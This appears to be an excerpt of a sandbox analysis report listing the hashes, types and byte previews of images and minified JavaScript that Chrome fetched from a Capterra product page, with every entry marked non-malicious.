                                                                                                                                                                                                        SSDEEP:48:+cKYjwEb/ywHThU45DslNb3P0RgE+/KXkiW2tejjLY5L3Pr6AAD2oiARN5KjaYh:+cLjXm45wlRsd+ydXej3oL/rNAximm
                                                                                                                                                                                                        MD5:2102B5F2A6BEEC7DCA71F9F138E99153
                                                                                                                                                                                                        SHA1:AF8D14BA80E84776FEE38F61E998CCE6FEFB29B6
                                                                                                                                                                                                        SHA-256:0291E3011F506DE63ABC4BC06A266D55877D34FB44013DD87E73A4AF913B0CD2
                                                                                                                                                                                                        SHA-512:2EDABCCF01B2A14B17C30BD4369F55FD1BCEF4DC7F40CF5CAB61B6EE4AC76FF026FC3DBED529105CC871FDFB3DAF4628E5B109820B40D1E9617409218254F1E1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/0d820dd6-6e0b-43de-becb-e9078a2d9fac.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma...................mdat........`...B2.......1@........el......$.......\....1.+O+..K.l..J.4......{z.H=....2.:.......D}..c...........};..~.5r..P..jy..3.1T.wC.|1...N..2..........?+...T...m..\..JJ..~...T..!..5.E...T..[.%.aCL....q.b.h.......Q....E..9.5......d.D..C....pX..Gk..........o.<..<h%..C..O..OIm....k.v...Y.07......>.mDN....8.(_.y...|H.....|....x.atb.. .....[...^.[.]gbF'a.7..QR.....G....:jX.\..?..j.%a....y...J..0..\.>....6G`..A........U..0k..X.P...-".6<c[..,%Q..<r.>..,...k8G(.Y..eu...fZ.B.v..1........7.Z...V_..f...kx.4^.d`}..y.. f.l{.~....N.u.$....a...v8.&.)..13U.C..CRy.....e......z..u.PF..8.....=..LH.-....H..r..t...?.......{.....p....B.8t..j_.....o.....@P..4y.;.....h....auaC...T..Z..,B...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):42
                                                                                                                                                                                                        Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                        MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                        SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                        SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                        SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://adservice.google.com/ddm/fls/z/dc_pre=CI_uo9mOnYgDFU1OpAQdGH4MHw;src=8036043;type=visit;cat=capte0;ord=8816183541542;npa=0;auiddc=*;ps=1;pcor=484373263;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (53860), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):53860
                                                                                                                                                                                                        Entropy (8bit):5.191917691339744
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:er9yGOUCyJ/Ep6mzmY+/XC5t3oZYDKNvNr/99fbrJzoHE:erb++/y5t3oZYDANr/XfbFoHE
                                                                                                                                                                                                        MD5:41B66EFCCB1313801667D4D9DE99BC74
                                                                                                                                                                                                        SHA1:A9CFE9403949539D94C1FBFBDD1D4EBFCE72D8F2
                                                                                                                                                                                                        SHA-256:CC4E800FF4EFCF53010C3B4FC5FABB8A0872C7E3E227ABFD51356E130A6EC60E
                                                                                                                                                                                                        SHA-512:D401268B09760AB6854EF693D854B277AD0ED4C018121AA2DC614CF2FFDE9ACDCA6B847464AE02BDEAC12DF65D0523BF530683BD1D05FBC47D243D5F238E7746
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/9615-3213d47f56f54ded.js
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9615],{67754:function(e,t,a){var r=a(534);a.o(r,"useParams")&&a.d(t,{useParams:function(){return r.useParams}}),a.o(r,"usePathname")&&a.d(t,{usePathname:function(){return r.usePathname}}),a.o(r,"useRouter")&&a.d(t,{useRouter:function(){return r.useRouter}}),a.o(r,"useSearchParams")&&a.d(t,{useSearchParams:function(){return r.useSearchParams}})},26863:function(e,t,a){a.d(t,{default:function(){return s.a}});var r=a(25327),s=a.n(r)},30359:function(e,t,a){Object.defineProperty(t,"$",{enumerable:!0,get:function(){return s}});let r=a(71364);function s(e){let{createServerReference:t}=a(18786);return t(e,r.callServer)}},97712:function(e,t,a){let r;a.d(t,{z:function(){return e6}}),(e0=e9||(e9={})).assertEqual=e=>e,e0.assertIs=function(e){},e0.assertNever=function(e){throw Error()},e0.arrayToEnum=e=>{let t={};for(let a of e)t[a]=a;return t},e0.getValidEnumValues=e=>{let t=e0.objectKeys(e).filter(t=>"number"!=typeof e[e[t]]),a=
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 86, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5180
                                                                                                                                                                                                        Entropy (8bit):7.943160626776474
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:RA1jipgItrutlU3jPXAhqSW2iRg8jmlS2nmblUOgmGVUvOmPbg3juXQt:ujipg/tibXAlYgqmlSAmblUOggWcdQt
                                                                                                                                                                                                        MD5:66EC233F3BB0A528A1B8C19DABB635B2
                                                                                                                                                                                                        SHA1:A725025FEB4F2390E4E9D68D45EDA7DB79D9CB94
                                                                                                                                                                                                        SHA-256:92343A8F8FA2566987794E3300E877186217886DCEB9243E45E9F382A8E097AE
                                                                                                                                                                                                        SHA-512:5E87E45C34923BC7F780A631ACE571D98FF7EC34229A86E7D3E27DCD10E841E5B5C104412C158F0D20E789A6805021FBAB3E00B4656223E145B243B98785F1CF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...V.......R.....sRGB.........IDATx^...#e.......gR..TU.fx........!..{p.G....E...<..EDq.u.d.y..."...X..F...(#.3.T.1......Jw.;..N%....+.JU...~...^`...!B...X..D.?3kD......u.VoO[.@8..}D.......\.X....+....!......... "0.A...!.QB.,...f..m....\.....3\..DH.=....H...(..?..l%......"&..Ll<..l...3+....$.0......F..T...'.Dv..(...M.G...uG.@..T....".5*-.1...4..Fb\..(\.&.....R....gDq.._m.j,+.z`E.p..L...m........[.._.&...5..5.44K.B&W.o.76PU.L8...._.1Dp.|......4E........23]...12$...].(.$^...dP,y....B..."w ..4.._......i.......n......*..=KL'gs.."b.|......A..T..Lfs......}..7...x..fZ..?.N.iKw'.@..Se..X[.....".P.v..........`.'...`..`s...b<.L.+o......Xs.;e~.*h.O..0.G_.gf.`.-H...Bfp....f..+...R....Q....)....c9.y"1]..@. `PA....{.-J......H....-k.kH.Fy......O.....D...6x.I.V.j@}...F.Eb.h3.bx.....+.e..W.a1f.53..7,..........a1f.X....R....p.J\......"P..6|/.Y./.%#.<.D.F..FZ..eh.9,"Z..7..8..o.....'...nQ..{.m'z.t........2......{.C.......13pg6W
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5583
                                                                                                                                                                                                        Entropy (8bit):7.363802794332929
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+7jd5N26MT0D5MdtbZPAVwzVJOaPze1xpIo0Cz/aDfKvqip:+7BoYNMtKwXOa7MxHAyyw
                                                                                                                                                                                                        MD5:973BCAA7A7EFEFEDDC3E45223F4E20CD
                                                                                                                                                                                                        SHA1:4D8FDF667C424E5DEFB38056F17683C0E4FB55BA
                                                                                                                                                                                                        SHA-256:00A4118A21976ED0692F091E84C9102D707A4D3580EEA960E221DED323F6FD97
                                                                                                                                                                                                        SHA-512:F345D5C0BA69DCE1FB2F0680BECB8528E2C59BFEE62F031D99CC4D1D28EC15E3CC7D13E8BA3AFBF145C2E29A0096469553FAF2633A56C2522F5B3A183C1DF2AD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/537ec30a-379d-42ed-9912-75af8cb47205.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............\...s.............R...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):90670
                                                                                                                                                                                                        Entropy (8bit):5.567246966706038
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:JbHaL6w1uJDjO+X2DZw43hR648ahUjti9gwL:JwlINgtrhUjtWN
                                                                                                                                                                                                        MD5:AC04136B91F707D7E485B6E78358C089
                                                                                                                                                                                                        SHA1:35078309A462A42D448A5C3483F8EA31229E0A56
                                                                                                                                                                                                        SHA-256:CEC5393CCA2F47625226898B5D533EF4E85B63BF727B43E20E63B7C810962EDC
                                                                                                                                                                                                        SHA-512:8632D2B97F4B38A06C1A178E267A78E8DA3C9A4A23F7F79D2A85906489108647C609700A383C9DD801B2A47CB15B1C05FCFB345D69721BEE0B40A8F85C6B9098
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/assets/js/8.3f6aefd1.chunk.js
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[8],{"+/Je":function(e,t,n){"use strict";n.d(t,"a",function(){return r}),n.d(t,"b",function(){return a});var r=-1,a="PRE-RENDER"},"+Kbs":function(e,t,n){"use strict";var r=n("YWhp"),a=n("S0ig"),o=n("ERkP"),i=n.n(o),c=function Attachment(e){var t=e.fill,n=void 0===t?a.a.composerIconColor:t,o=e.height,c=void 0===o?16:o,s=e.width,u=void 0===s?18:s;return i.a.createElement(r.a,{className:"drift-default-icon drift-default-icon--back-arrow",width:u,height:c,viewBox:"0 0 16 18"},i.a.createElement("path",{fill:n,fillRule:"evenodd",d:"M8.078 16a.71.71 0 0 1-.513-.222.784.784 0 0 1 0-1.075l7.53-7.879c.562-.587.871-1.368.871-2.199 0-.83-.31-1.611-.87-2.197a2.883 2.883 0 0 0-4.204 0l-8.735 9.139c-.493.516-.73 1.012-.703 1.476.026.452.298.801.46.968.27.284.563.402.892.358.413-.054.888-.35 1.375-.86l6.854-7.172a.703.703 0 0 1 1.026 0 .784.784 0 0 1 0 1.074l-6.853 7.172c-.728.761-1.475 1.196-2.222 1.293-.783.102-1.509-.172-2.1-.79-.528-.553-.841-1.2
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (577)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5105
                                                                                                                                                                                                        Entropy (8bit):4.9980534017840785
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+zpHg/ci55bnkCggXCyfnWeQUjqsTiAb0MgVnEHOJgluUc7yhUe9PqGpdxEiJTB:+zNg/PvjXjnWJVLAb0MgVnEHOJAuUvi4
                                                                                                                                                                                                        MD5:6E96EFF760A568F7BD67DF9BE2454FDD
                                                                                                                                                                                                        SHA1:CA3376553209AB4384165330069C6221C66F866A
                                                                                                                                                                                                        SHA-256:08DD507F27923557ECB1D8F4504A2851336ED0167E60B56B61FA111D9F05BD6F
                                                                                                                                                                                                        SHA-512:7B7F498ACB9ECFED1B6CA48B32BAB9799B3381491CEF5884BEDD09BE597503E705B169891CA8A402A83CBA58070D96CDD404C3B13AE4EAB5C88164F9474C40C9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://forms-as-a-service.capterra.com/faas-modal-payload.js?formId=3ob5sl3RSLbslH6LvzUKQc
                                                                                                                                                                                                        Preview:(function () {. function fixScriptTagsNotExecuting(node) {. if (node.tagName === "SCRIPT") {. node.parentNode.replaceChild(cloneScriptNode(node), node);. } else {. var i = -1,. children = node.childNodes;. while (++i < children.length) {. fixScriptTagsNotExecuting(children[i]);. }. }. return node;.}..function cloneScriptNode(node) {. var script = document.createElement("script");. script.text = node.innerHTML;.. var i = -1,. attrs = node.attributes,. attr;. while (++i < attrs.length) {. script.setAttribute((attr = attrs[i]).name, attr.value);. }. return script;.}.. var state={"modalDisplayFrequency":"Once per user, ever","formId":"3ob5sl3RSLbslH6LvzUKQc","baseUrl":"https://forms-as-a-service.capterra.com","isTest":false,"BETA_BASE_URL":"https://forms-as-a-service.capstage.net","BETA_RATE":0,"modalRestrictedUrls":["/sem/","/sem-compare/","raas.capterra.com","review.capterra.com","reviews.capterra.com","insights.capterra.com","capterra.com/works
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 128 x 128, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3703
                                                                                                                                                                                                        Entropy (8bit):7.669480574001665
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:V4rWWxfkE0r+mkYy7NR2DCiCbEQlxIX1S9QT2dMYraNDbNIl:V4nerFy7N8D6YQl+RT2eNNHal
                                                                                                                                                                                                        MD5:3703D3AD3DE65C108D5AF58CB4AD9E51
                                                                                                                                                                                                        SHA1:1DD11BF831504269CFBC7FF06A53C28622EFE0BF
                                                                                                                                                                                                        SHA-256:5CD1469AA5887D1223DC624FC49BDEABCFB2B97821843219D48AA246DD483753
                                                                                                                                                                                                        SHA-512:803B306D08FAB4B34597BCC6CB7DEB9F7CBBCFA7BA1FDBCCDC335FCF77918870D8C1463EE41809B81A071F7BD6A15B529C300AF3D4B274986A4B725234B50692
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................sRGB.........PLTEGpL.......................................................................................................................................................................................................................................................................................................................................................................................d.............................{..........................j...........E................................U..[..............u..b..<..B.....K..f....t................n.....6..Y..~................."........1......N..D.............>................R.......w...............p.....?..'..z................4...........9.....l.....................-..8...................*.._..{.......|=.j....tRNS...F......A.........p.3.$|....Y`S...l7.,"...W..]...:.......)..Q s......J....t.>...U..&.d.x......v...gN.D.K#........................................................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (21302), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):21302
                                                                                                                                                                                                        Entropy (8bit):5.39265571540588
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:MQnMQ7bd98IIG/9TE2URFGs6EI6zD4UzR/ye/wwcGkakN/:b75980FTIEfa8oR/X1cJJ
                                                                                                                                                                                                        MD5:3CF5078223819D96522832E72D90FF2D
                                                                                                                                                                                                        SHA1:F64106CB7E20A941DDA1D9A89EBAFD6F21B4C640
                                                                                                                                                                                                        SHA-256:BC57E09B8A43CE5E5B7616D42BA5D8C4DAB0039085AFA4F1B96F51C7C26A605A
                                                                                                                                                                                                        SHA-512:E578DE9932011198E7B2ED32A6D70CEEA5816DF419CFFAC18179205303E45CA425E24CC2C3D461B2404E075773D61C7E3C3F20DB7FB07DE950D905D4F6C29C98
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1792],{65880:function(e,t,r){r.d(t,{default:function(){return o.a}});var n=r(25839),o=r.n(n)},87659:function(e,t,r){r.d(t,{default:function(){return o.a}});var n=r(65469),o=r.n(n)},79912:function(e,t,r){Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"addLocale",{enumerable:!0,get:function(){return n}}),r(72679);let n=function(e){for(var t=arguments.length,r=Array(t>1?t-1:0),n=1;n<t;n++)r[n-1]=arguments[n];return e};("function"==typeof t.default||"object"==typeof t.default&&null!==t.default)&&void 0===t.default.__esModule&&(Object.defineProperty(t.default,"__esModule",{value:!0}),Object.assign(t.default,t),e.exports=t.default)},52774:function(e,t,r){function n(e,t,r,n){return!1}Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"getDomainLocale",{enumerable:!0,get:function(){return n}}),r(72679),("function"==typeof t.default||"object"==typeof t.default&&null!==t.default)
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):52916
                                                                                                                                                                                                        Entropy (8bit):5.51283890397623
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                                        MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                                        SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                                        SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                                        SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4760), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4760
                                                                                                                                                                                                        Entropy (8bit):5.802046346082399
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRUFjKGA5d:1DY0hf1bT47OIqWb1gjKVj
                                                                                                                                                                                                        MD5:962112379F53A29DABE8F17E3D2AF807
                                                                                                                                                                                                        SHA1:300801E33AC29A28D12FA3D3243B421B3DB74194
                                                                                                                                                                                                        SHA-256:186CE52345E3877A5D4BFA459DEEE020DE0101619F806CE95CA5E17DC85BB8E6
                                                                                                                                                                                                        SHA-512:54EB6CCEC0CEE3E20B9ADEB07DC1E0DAE304E7BC7EF21639E651D547ADFED2CFAF1410E646625AE29D57D1EE69ECB877D522050FD9A6865ACF29061C19FE0B7E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072635088/?random=1725034607177&cv=11&fst=1725034607177&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&hn=www.googleadservices.com&frm=0&tiba=Publicate%20Pricing%2C%20Alternatives%20%26%20More%202024%20%7C%20Capterra&npa=0&pscdl=noapi&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=4
                                                                                                                                                                                                        Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6585
                                                                                                                                                                                                        Entropy (8bit):7.967909854860759
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:iFjxKjV2qRRnnHVnTL+jYZdh9RA8iK9+jANXLyO90M8EzmKB24A727:ojUjAsRnHVnkch9Ryo+kAOWomKB2Jg
                                                                                                                                                                                                        MD5:C3C02DB426BC078AC86AEE4D844BB1C3
                                                                                                                                                                                                        SHA1:0B37625BCC9A2EDF6ACE5D7CE849161AA31733AD
                                                                                                                                                                                                        SHA-256:502C1D3D215491C3D4F500A731C426739ABF568B181B3D81992466AA06E60BC1
                                                                                                                                                                                                        SHA-512:5D4FDC98CECCCC6391DD2B65AD18BF6CC420922B587D4C13A439A61C63D2506B99F6550895B68C1831A29921266119D050E1350CA39217D8DE1CAFD0F5C67C30
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.....9d6.....sRGB........sIDATx^..xTU....I%.T.!..@.)..D..6.&>...mw?.]]W...*..Z.j[Y.awU..W..i).$...B...e...{.$.d&.;...<)s........B;..}=..k...aF_"D... .@....|.tc@....3p.@..N.......-[X9.l...}<....B;#...@.4....a$1.....G.L.g.,.......K.w....k..(#.4.d.~...R<.N..Y.vD..8qM. .Z..I.......].z....Y.....Fy$..x..........CW...z.....a$(..U.Z.."..W.H..b..i.}....~n:....8~m.Y.,.....h"....:.[o.\..&....;2.d..Mp..G.......,.a0. [..n.......].."j>K.s...Y`.bEe..".Qf.&!...kH......o.5..WL.....i...'....l.B.:.]..K)'r6.Yh.^.QIL....$"b......J..6....0'..Q.a...1.~.....a.vla/E.+4>K.W.J...x.m..6.8~UL. .e...v.m/3..." ........\..k..V.,..V...."K...[s...;t..U...=.....j-x...U...X....m..31.2i.'.-./D{.x.Q.T+....m.m)..c.....[!..r.......Z&...n!...S.c.y9_...a....B..@..-@...8\%.8qE.l.....*f..^. .k.u.....!hj.....K......2.A..;.>].....01d..M..;p..NZ.=......%.. =Q5>t..q...].RF..1SUh...0.M\...".b..n".n.-.i!..).r?D[...2.&.]...&....aZ...{.c...G.F.....kmO.S.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (17065), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):17065
                                                                                                                                                                                                        Entropy (8bit):5.1089101567430735
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:FtDuCrl6xOIVoCM6qbSjbCMTYozln0/s4MXcK/qtQCZ69CmC4yVs:FtDuCrl6x1OCM1SjbCMTYoz10/s4mcKF
                                                                                                                                                                                                        MD5:E28EBC3391B56E8F01EA063DC089E9D3
                                                                                                                                                                                                        SHA1:D0EB0EDDB70199DB3533F492E7F2E22BE890A1FA
                                                                                                                                                                                                        SHA-256:AFBD41E7209FA3AEF6F53C7A5713AA542A7BE54C432FEC2D690E0DFACCD528D1
                                                                                                                                                                                                        SHA-512:A2ED47575F06F20F3C53845F527E5CEF910A85AAB2CC8F07EFD761239C2255920A154CDF432E170207BE23841458D22BFA96C47CD4ECA590BC71A948B8F98F46
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[19],{"1J7a":function(t,e){t.exports=function _arrayWithHoles(t){if(Array.isArray(t))return t}},"2jbg":function(t,e,r){"use strict";function _setPrototypeOf(t,e){return(_setPrototypeOf=Object.setPrototypeOf||function _setPrototypeOf(t,e){return t.__proto__=e,t})(t,e)}r.d(e,"a",function(){return _setPrototypeOf})},"4+fu":function(t,e,r){"use strict";function _assertThisInitialized(t){if(void 0===t)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return t}r.d(e,"a",function(){return _assertThisInitialized})},"5aO3":function(t,e,r){"use strict";function _arrayLikeToArray(t,e){(null==e||e>t.length)&&(e=t.length);for(var r=0,n=new Array(e);r<e;r++)n[r]=t[r];return n}r.d(e,"a",function(){return _arrayLikeToArray})},"7Ru6":function(t,e){t.exports=function _nonIterableRest(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [S
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2256
                                                                                                                                                                                                        Entropy (8bit):7.871258333075124
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:4AYaLL7E8EIewOXP2RdX1s5rEqLxZrasjQk2EZsNcqr7/wsNis:tLXE8EIewVu5rEqLnrldsNpr7//is
                                                                                                                                                                                                        MD5:9187AD9188FF17EF8FB2673ECB7C5AFE
